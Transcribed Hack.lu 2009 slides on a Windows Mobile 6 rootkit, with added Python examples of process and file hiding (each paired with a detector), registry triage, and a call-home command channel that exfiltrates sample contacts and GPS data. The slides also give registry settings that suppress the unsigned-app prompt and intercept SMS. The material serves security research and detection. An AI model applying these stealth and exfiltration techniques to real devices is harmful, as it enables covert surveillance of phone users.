8/9/2019 2009 Hack.lu Slides WM6 Rootkit
When E.T. comes into Windows Mobile 6
a.k.a. PoC(k)ET

Cedric Halbronn, Sogeti / ESEC R&D
cedric(at)security-labs.org

Hack.lu 2009
Plan

1 Context / Objectives
2 Technical aspects of WM6
3 Implementation
  General architecture
  Injection
  Protection
  Backdoor
  Services
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 2/35
Context

Who am I?
- Security researcher working at the Sogeti ESEC R&D lab
- Focusing on mobile security

A smartphone?
- Mobile phone + smartphone: various services (PDA, Web, camera, GPS, microphone, etc.)
- Current OSes: Symbian, RIM OS, Windows Mobile 6, iPhone OS, Android
- Studies of rootkit capabilities on mobile phones are still limited
Objectives

TODO list
- Develop a rootkit for WM6

What is a rootkit?
- Post-exploitation
- Components: injection, protection, backdoor, services

Taking into account...
- Embedded constraints / mobile environment
- Services on the table
Virtual Memory Address Space

(Figure: global virtual memory address space, 4 GB. WM6 is built on Windows CE 5.x, which carves the lower 2 GB into 32 MB slots with one slot per running process; this is the origin of the 32-process limit referred to later.)
Loading DLLs

(Figure: loading DLLs under Windows Mobile 6)
Security policies

Where?
- Registry: [HKLM\Security\Policies\Policies]

Some examples

Policy                        ID    Values
Auto Run Policy               2     0 (allowed to run automatically), 1 (restricted)
Unsigned Applications Policy  1006  1 (allowed to run), 0 (not allowed to run)
Unsigned Prompt Policy        101A  0 (user will be prompted), 1 (user will not be prompted)
Password Required Policy      1023  0 (a password is required), any other value (a password is not required)
Application signing

Stores for code execution
- Privileged store: privileged execution trust authorities
- Unprivileged store: unprivileged execution trust authorities
- SPC (Software Publisher Certificates) store: trust authorities for CAB installation
- Sign DLLs, EXEs or CABs and put the certificate in the right store

Stores for SSL chain validation, NOTHING to do with code execution
- MY: end-user personal certificates
- CA: intermediary certification authority certificates
- ROOT: root (self-signed) certificates
Technical choices

Architecture
- Hide its presence from the phone's user
- Exfiltrate information

Technical choices
- 32-process limit: a single .EXE, multi-threaded (one process slot for the whole rootkit rather than one per service)
- DLL impact: limit their size (on CE 5.x a DLL's address range is reserved in every process slot, so large DLLs shrink the space available to all processes)
- Battery usage: limit actions to when they are needed
- Heterogeneous environment
Architecture

(Figure: rootkit general architecture)
Rootkit injection

Injection methods
- Smartphone access
- Vulnerability exploit. Ex: MMS handler in WM2003, WAP Push message
- Web link. Ex: Etisalat operator in the United Arab Emirates (UAE) for BlackBerries
- OTA provisioning

Our context
- Smartphone access
- Unsigned CAB: the user gets a pop-up (figure: unsigned-application pop-up); hiding it is dealt with under Protection
Automatic startup for an application

Auto-start methods
- [HKLM\Init] registry key
- \Windows\Startup folder
- Create a service: DLL loaded by services.exe

Our choice
- \Windows\Startup
Hide unsigned apps (1/2)

By default
- Necessary so we do NOT alert the phone user

First attempt
- Disable the unsigned prompt policy: [HKLM\Security\Policies\Policies] 0000101a=dword:1

Result
- Not good, because every external unsigned application will then run without alerting the user
Hide unsigned apps (2/2)

Second attempt
- Better to have our own certificate
- We can sign our binaries and put our certificate in the Privileged store

Visible stores on the device
- MY, CA, ROOT
- Other stores are NOT visible: the execution trust stores, Privileged included, cannot be browsed from the device UI

Result
- Our own certificate will not be visible on the device

(Figure: visible certificate stores)
Hide processes (1/2)

First attempt
- By default, not needed: the Task Manager does NOT show them
- Apparently, it does not show processes that do not have a visible window

(Figures: WM6 Task Manager; TaskManagerCE by K. Varma (c))
Hide processes (2/2)

Second attempt
- For better results, it is possible to hide them a little bit more, using the method from Petr Matousek (2007)

Details
- No doubly-linked list here: the 32 processes are stored in a fixed table, PPROCESS table[32]
- The function listing the processes browses this table and checks a condition on the process name to consider a slot used
- Setting the name to NULL: the process is NOT listed
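The table walk described above, as an added example that is not part of the talk: a Python model of the 32-slot process table and of a lister that keys on the name field, followed by the cross-view check a detector would run against it. The slot layout (pid, name, thread count) is an assumption made for the simulation and is not the real Windows CE PROCESS structure.

```python
from dataclasses import dataclass
from typing import List, Optional

MAX_PROCESSES = 32  # fixed table size on Windows CE 5.x / WM6


@dataclass
class ProcessSlot:
    """Toy stand-in for one PROCESS entry (illustrative fields, not the real layout)."""
    pid: int = 0                  # 0: slot never allocated
    name: Optional[str] = None    # the only field the lister keys on
    thread_count: int = 0         # an independent 'in use' signal for the detector


def new_table() -> List[ProcessSlot]:
    return [ProcessSlot() for _ in range(MAX_PROCESSES)]


def spawn(table: List[ProcessSlot], pid: int, name: str, threads: int = 1) -> int:
    """Occupy the first free slot; fail like the OS does once all 32 are taken."""
    for idx, slot in enumerate(table):
        if slot.pid == 0:
            slot.pid, slot.name, slot.thread_count = pid, name, threads
            return idx
    raise RuntimeError("32-process limit reached")


def list_processes(table: List[ProcessSlot]) -> List[str]:
    """The slide's listing logic: a slot is reported only if its name is set."""
    return [slot.name for slot in table if slot.name is not None]


def hide_process(table: List[ProcessSlot], pid: int) -> None:
    """The rootkit's move: blank the name, leave the process itself running."""
    for slot in table:
        if slot.pid == pid:
            slot.name = None
            return
    raise KeyError(pid)


def cross_view_hidden(table: List[ProcessSlot]) -> List[int]:
    """Detector: allocated slots (pid set, threads running) that carry no name.

    Comparing two views of the same structure is the usual answer to this kind
    of hiding: the name-based lister and the pid/thread view disagree exactly
    on the blanked entry.
    """
    return [slot.pid for slot in table
            if slot.pid != 0 and slot.thread_count > 0 and slot.name is None]


if __name__ == "__main__":
    t = new_table()
    for pid, exe in ((0x400, "nk.exe"), (0x410, "filesys.exe"), (0x420, "device.exe")):
        spawn(t, pid, exe)
    spawn(t, 0x430, "rootkit.exe", threads=3)
    hide_process(t, 0x430)
    print(list_processes(t))     # rootkit.exe is gone from the task-manager view
    print(cross_view_hidden(t))  # [1072]: the cross-view check still finds pid 0x430
```

Because the hidden process keeps its slot, pid and threads, anything that walks the table on a different field than the name (or simply counts non-zero pids against the lister's output) exposes the gap; the trick only defeats listers that trust the name field.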
Hide files

First attempt
- At first, not needed: who browses files on a mobile phone?

Second attempt
- For better results, it is possible to hide them a little bit more, using the method from Petr Matousek (2007)

Details
- Inject a DLL into the process handling the file system functions
- Hook the file listing functions: FindFirstFileW, FindNextFileW
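The hook pair described above, as an added example in Python rather than the talk's injected DLL. The "original" FindFirstFileW/FindNextFileW are a toy in-memory directory (an assumption), the hooked versions filter a hidden-name prefix, and the case where the very first entry returned is one to hide is handled explicitly, since a hook that forgets it leaks the hidden name on every listing. hidden_entries shows the diff a detector can run when it has an enumeration path that bypasses the hook.

```python
from typing import Callable, Dict, List, Optional, Tuple

INVALID_HANDLE_VALUE = -1
ERROR_FILE_NOT_FOUND = 2
ERROR_NO_MORE_FILES = 18

# Constructed sample directory tree (path -> entries) standing in for the device's file system.
FAKE_FS: Dict[str, List[str]] = {
    "\\Windows": ["pocket.exe", "poc_hook.dll", "notes.exe"],
    "\\Windows\\Startup": ["welcome.lnk", "pocket.lnk"],
    "\\Temp": ["poc.log"],
}
HIDDEN_PREFIX = "poc"   # what the rootkit hides (assumed naming, for the example only)

_handles: Dict[int, Tuple[List[str], int]] = {}   # find handle -> (entries, cursor)
_next_handle = 1
_last_error = 0

def get_last_error() -> int:
    return _last_error

# --- the 'original' exports of the file-system process, before hooking ---
def orig_FindFirstFileW(path: str) -> Tuple[int, Optional[str]]:
    global _next_handle, _last_error
    entries = FAKE_FS.get(path)
    if not entries:
        _last_error = ERROR_FILE_NOT_FOUND
        return INVALID_HANDLE_VALUE, None
    handle, _next_handle = _next_handle, _next_handle + 1
    _handles[handle] = (entries, 1)      # entry 0 is returned now; cursor points past it
    return handle, entries[0]

def orig_FindNextFileW(handle: int) -> Optional[str]:
    global _last_error
    entries, cursor = _handles[handle]
    if cursor >= len(entries):
        _last_error = ERROR_NO_MORE_FILES
        return None
    _handles[handle] = (entries, cursor + 1)
    return entries[cursor]

def orig_FindClose(handle: int) -> None:
    _handles.pop(handle, None)

# --- the hooked versions the injected DLL installs in their place ---
def _is_hidden(name: str) -> bool:
    return name.lower().startswith(HIDDEN_PREFIX)

def hooked_FindNextFileW(handle: int) -> Optional[str]:
    # Keep pulling from the real listing until a visible entry or the real end.
    name = orig_FindNextFileW(handle)
    while name is not None and _is_hidden(name):
        name = orig_FindNextFileW(handle)
    return name

def hooked_FindFirstFileW(path: str) -> Tuple[int, Optional[str]]:
    global _last_error
    handle, name = orig_FindFirstFileW(path)
    if handle == INVALID_HANDLE_VALUE:
        return handle, None
    if _is_hidden(name):
        # The first real entry is one we hide: advance before handing anything back.
        name = hooked_FindNextFileW(handle)
        if name is None:
            # Only hidden files in here: behave like an empty search, with the
            # error code FindFirstFileW callers expect, not ERROR_NO_MORE_FILES.
            orig_FindClose(handle)
            _last_error = ERROR_FILE_NOT_FOUND
            return INVALID_HANDLE_VALUE, None
    return handle, name

FindFirst = Callable[[str], Tuple[int, Optional[str]]]
FindNext = Callable[[int], Optional[str]]

def walk_dir(path: str, first: FindFirst, nxt: FindNext) -> List[str]:
    """Enumerate a directory the way any Win32 caller (File Explorer, an AV) does."""
    handle, name = first(path)
    if handle == INVALID_HANDLE_VALUE:
        return []
    out = [name]
    while True:
        name = nxt(handle)
        if name is None:
            break
        out.append(name)
    orig_FindClose(handle)
    return out

def hidden_entries(path: str) -> List[str]:
    """Detector: diff the hooked view against a view that bypasses the hook."""
    visible = set(walk_dir(path, hooked_FindFirstFileW, hooked_FindNextFileW))
    return [n for n in walk_dir(path, orig_FindFirstFileW, orig_FindNextFileW)
            if n not in visible]

if __name__ == "__main__":
    print(walk_dir("\\Windows", hooked_FindFirstFileW, hooked_FindNextFileW))
    print(hidden_entries("\\Windows"))
```

On a real device the "bypassing" view in hidden_entries would have to come from somewhere the hook does not sit, for instance an offline read of the storage; inside the hooked process every API caller sees the same filtered listing, which is exactly why the hook is placed there.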
Hide CAB installation (1/3)

(Figure: Add/Remove Programs)

CAB installation management
- [HKLM\Security\AppInstall]: a key is created in it for each installed app
Hide CAB installation (2/3)

First attempt
- Method taken from Airscanner Mobile Firewall
- When the value Role is set to 0, the entry disappears from the list

(Figure: Airscanner Mobile Firewall (c))
Hide CAB installation (3/3)

Second attempt
- In Visual Studio, specify the NoUninstall option in the CAB project

Result
- No key is created in [HKLM\Security\AppInstall], so there is nothing for Add/Remove Programs, or for a check of that key, to find

(Figure: NoUninstall option)
TCP/IP communication

Means of communication
- Data networks: GPRS, EDGE, 3G
- Wi-Fi
- ActiveSync

How to do it?
- The phone is behind a NAT and cannot be reached inbound, so a TCP/IP server runs on the attacker's side and the phone connects out to it

Save battery life
- Detect an existing connection, then use it (Connection Manager)
An alternative means?

Problem
- How to control the device when there is no data connectivity? An alternative means of communication is necessary

SMS messages
- Command SMS: intercepted

Registry keys defined to intercept SMS messages
- Standard COM registration: HKEY_CLASSES_ROOT\CLSID\{GUID}\InProcServer32  @=SMSIntercept.dll
- MAPI Inbox rule client: HKEY_LOCAL_MACHINE\Software\Microsoft\Inbox\Svc\SMS\Rules  {GUID}=dword:1
- {GUID} represents the COM object's class ID GUID

Side effect
- When intercepting an SMS, the phone automatically switches on (wakes up)
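A triage script that ties together the registry artifacts from several slides (Security policies, Hide unsigned apps (1/2) and (2/2), Automatic startup, Hide CAB installation (2/3), and the SMS interception keys above); this is an added example, not code from the talk. It reads a .reg-style text export, so it runs offline on a dump taken from the device or over ActiveSync. The sample export is constructed: the GUID, the certificate thumbprint and the "pocket" entries are placeholders. The location of the Privileged execution trust store under HKLM\Comm\Security\SystemCertificates is assumed from Windows CE conventions and is not stated on the slides.

```python
import re
from typing import Callable, Dict, List, Tuple, Union

Value = Union[int, str]
Hive = Dict[str, Dict[str, Value]]   # lower-cased key path -> {lower-cased value name -> value}

# Policy IDs and semantics from the 'Security policies' slide: id -> (name, is_weak, meaning)
POLICIES: Dict[str, Tuple[str, Callable[[int], bool], str]] = {
    "00000002": ("Auto Run Policy", lambda v: v == 0, "auto-run allowed"),
    "00001006": ("Unsigned Applications Policy", lambda v: v == 1, "unsigned apps may run"),
    "0000101a": ("Unsigned Prompt Policy", lambda v: v == 1, "user NOT prompted for unsigned apps"),
    "00001023": ("Password Required Policy", lambda v: v != 0, "no device password required"),
}
POLICY_KEY = "hkey_local_machine\\security\\policies\\policies"
INIT_KEY = "hkey_local_machine\\init"
APPINSTALL = "hkey_local_machine\\security\\appinstall\\"
SMS_RULES = "hkey_local_machine\\software\\microsoft\\inbox\\svc\\sms\\rules"
# Assumed location of the Privileged execution trust store (not stated on the slides).
PRIV_STORE = ("hkey_local_machine\\comm\\security\\systemcertificates\\"
              "privileged execution trust authorities\\certificates\\")

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^(?:"([^"]+)"|(@))=(.*)$')


def parse_reg(text: str) -> Hive:
    """Minimal .reg reader: [key] headers, "name"=dword:hex, "name"="str" and @= defaults."""
    hive: Hive = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            hive.setdefault(current, {})
            continue
        m = _VAL_RE.match(line)
        if not m or current is None:
            continue
        name, rhs = (m.group(1) or "@").lower(), m.group(3)
        if rhs.lower().startswith("dword:"):
            hive[current][name] = int(rhs[6:], 16)
        elif len(rhs) >= 2 and rhs[0] == rhs[-1] == '"':
            hive[current][name] = rhs[1:-1]
    return hive


def triage(hive: Hive) -> List[str]:
    findings: List[str] = []
    for pid, (desc, is_weak, meaning) in POLICIES.items():
        v = hive.get(POLICY_KEY, {}).get(pid)
        if isinstance(v, int) and is_weak(v):
            findings.append(f"policy {pid} ({desc}) = {v}: {meaning}")
    for name, v in sorted(hive.get(INIT_KEY, {}).items()):
        if name.startswith("launch"):
            findings.append(f"HKLM\\Init {name} -> {v} (auto-start; compare with a clean baseline)")
    for clsid, v in hive.get(SMS_RULES, {}).items():   # value named by CLSID, set to 1
        if clsid.startswith("{") and v == 1:
            dll = hive.get("hkey_classes_root\\clsid\\" + clsid + "\\inprocserver32", {}).get("@", "<unresolved>")
            findings.append(f"SMS rule client {clsid} enabled, served by {dll}")
    for key, values in hive.items():
        if key.startswith(APPINSTALL) and values.get("role") == 0:
            findings.append(f"AppInstall\\{key[len(APPINSTALL):]} has Role=0: hidden from Add/Remove Programs")
        elif key.startswith(PRIV_STORE):
            findings.append(f"certificate {key[len(PRIV_STORE):]} in the Privileged store (not browsable from the device UI)")
    return findings


# Constructed sample export; GUID, thumbprint and the 'pocket' entries are placeholders.
SAMPLE_EXPORT = r"""
[HKEY_LOCAL_MACHINE\Security\Policies\Policies]
"00001006"=dword:00000001
"0000101a"=dword:00000001
"00001023"=dword:00000001

[HKEY_LOCAL_MACHINE\Init]
"Launch10"="shell.exe"
"Launch50"="device.exe"
"Launch99"="pocket.exe"

[HKEY_LOCAL_MACHINE\Security\AppInstall\Notes]
"Role"=dword:00000001

[HKEY_LOCAL_MACHINE\Security\AppInstall\Pocket]
"Role"=dword:00000000

[HKEY_CLASSES_ROOT\CLSID\{00000000-1111-2222-3333-444444444444}\InProcServer32]
@="\Windows\SMSIntercept.dll"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Inbox\Svc\SMS\Rules]
"{00000000-1111-2222-3333-444444444444}"=dword:00000001

[HKEY_LOCAL_MACHINE\Comm\Security\SystemCertificates\Privileged Execution Trust Authorities\Certificates\0123456789ABCDEF0123456789ABCDEF01234567]
"Blob"=hex:30,82
"""

if __name__ == "__main__":
    for finding in triage(parse_reg(SAMPLE_EXPORT)):
        print(finding)
```

Each check maps to one of the hiding tricks: a Role=0 entry is the Airscanner-style hide, a certificate under the Privileged store is the signing trick from "Hide unsigned apps (2/2)", and an enabled rule client whose InProcServer32 points at an unexpected DLL is the SMS backdoor. The NoUninstall variant leaves no AppInstall key at all, which is why the script also lists the auto-start entries rather than relying on AppInstall alone.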
Protocol

(Figure: communication protocol)
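The reverse-connection channel from the TCP/IP slide, as an added example that is not taken from the talk (whose protocol figure is not reproduced here): the phone side connects out through the NAT to a server on the attacker's side, announces itself, and answers commands until BYE. The 4-byte length-prefixed framing and the command names are assumptions of this example; run_demo runs both ends on localhost, and the service data is a constructed dict standing in for what the rootkit's services would collect.

```python
import socket
import struct
import threading
from typing import Callable, Dict, List, Tuple

HDR = struct.Struct("!I")  # 4-byte big-endian length prefix (assumed framing)


def send_frame(sock: socket.socket, payload: str) -> None:
    data = payload.encode("utf-8")
    sock.sendall(HDR.pack(len(data)) + data)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf


def recv_frame(sock: socket.socket, limit: int = 1 << 16) -> str:
    (length,) = HDR.unpack(recv_exact(sock, HDR.size))
    if length > limit:              # refuse absurd lengths before allocating for them
        raise ValueError("frame too large")
    return recv_exact(sock, length).decode("utf-8")


# --- attacker side: listens, drives the session once the phone calls home ---
def serve_one(listener: socket.socket, commands: List[str]) -> List[Tuple[str, str]]:
    """Accept a single callback, issue each command, return (command, reply) pairs."""
    conn, _ = listener.accept()
    with conn:
        log = [("HELLO", recv_frame(conn))]
        for cmd in commands:
            send_frame(conn, cmd)
            log.append((cmd, recv_frame(conn)))
        send_frame(conn, "BYE")
    return log


# --- phone side: connects out, answers commands until BYE ---
def call_home(host: str, port: int, device_id: str,
              handlers: Dict[str, Callable[[], str]]) -> int:
    """Return the number of commands served; unknown commands get an ERR reply."""
    served = 0
    with socket.create_connection((host, port), timeout=5) as sock:
        send_frame(sock, f"HELLO {device_id}")
        while True:
            cmd = recv_frame(sock)
            if cmd == "BYE":
                return served
            handler = handlers.get(cmd)
            send_frame(sock, handler() if handler else "ERR unknown command")
            served += 1


# Constructed sample data standing in for the rootkit's services
SAMPLE_HANDLERS: Dict[str, Callable[[], str]] = {
    "GET contacts": lambda: "Doe;John;+33600000000",
    "GET gps": lambda: "48.8566,2.3522",
}


def run_demo() -> Tuple[List[Tuple[str, str]], int]:
    """Run server and client on localhost; return the server log and the count served."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))          # ephemeral port: nothing hard-coded
    listener.listen(1)
    port = listener.getsockname()[1]
    result: List[List[Tuple[str, str]]] = []
    t = threading.Thread(target=lambda: result.append(
        serve_one(listener, ["GET contacts", "GET gps", "GET sms"])))
    t.start()
    served = call_home("127.0.0.1", port, "device-01", SAMPLE_HANDLERS)
    t.join()
    listener.close()
    return result[0], served


if __name__ == "__main__":
    log, n = run_demo()
    for cmd, reply in log:
        print(f"{cmd!r} -> {reply!r}")
    print("served", n)
```

On the device, call_home would only be started once the Connection Manager reports that a data connection already exists, which is the battery-saving point on the slide; that API is not modelled here. The length check in recv_frame is the kind of bound the slide's "compression / encryption of communications" enhancement would sit on top of.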
Services

Services on the table
- Contacts: last name, first name, mobile phone
- SMS: delivery time, sender, content
- E-mails: sender, recipients, delivery time, subject, content
- GPS: latitude, longitude

Registers to the OS
- Notification when data are available
Demo
Conclusion

Results
- Not detected by AVs (figure: Airscanner Antivirus)
- Only detectable if we know where to look

Limits / enhancements
- DLLs, registry keys, network connections
- Compression / encryption of communications
- Services: phone-tapping, microphone, camera...

Attacker's point of view
- Win32 APIs, but embedded constraints
- What about the other mobile OSes?
Questions?
Thank you for your attention